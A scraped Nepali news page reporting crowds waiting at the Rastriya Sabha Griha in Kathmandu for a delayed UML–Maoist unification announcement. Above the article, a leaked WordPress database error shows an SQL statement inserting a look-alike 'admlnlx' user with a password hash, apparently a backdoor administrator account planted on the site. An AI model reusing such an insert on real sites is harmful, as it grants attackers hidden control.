WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BX9hcJ0NwjsxcfVmlCgKLbx32xWEgu.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-07 19:14:26', '', 'admlnlx', 'admlnlx')
काठमाडौं– केहीबेरमा एमाले माओवादी पार्टी एकता घोषणा हुने स्थान राष्ट्रियसभा गृहमा नेता कार्यकर्ताको घुँइचो लागको छ । एकता घोषणा सुन्न नेता कार्यकर्ताहरु बिहिबार मध्यान्हबाटै राष्ट्रिय सभागृह पुगेका थिए ।
चारबजे पार्टी एकता हुने भनिएपनि दलहरु आन्तरिक गृहकार्यमै व्यस्त भएकाले साढे चार बजेसम्म पनि एकताका लागि नेताहरु सभागृह आइपुगेका छैनन् । सभागृहको हलभित्र मञ्च तथा कुर्सीको व्वस्थापन भइरहेको छ भने बाहिरतर्फ नेता कार्यकर्ता खचाखच बसेका देखिन्छन् ।











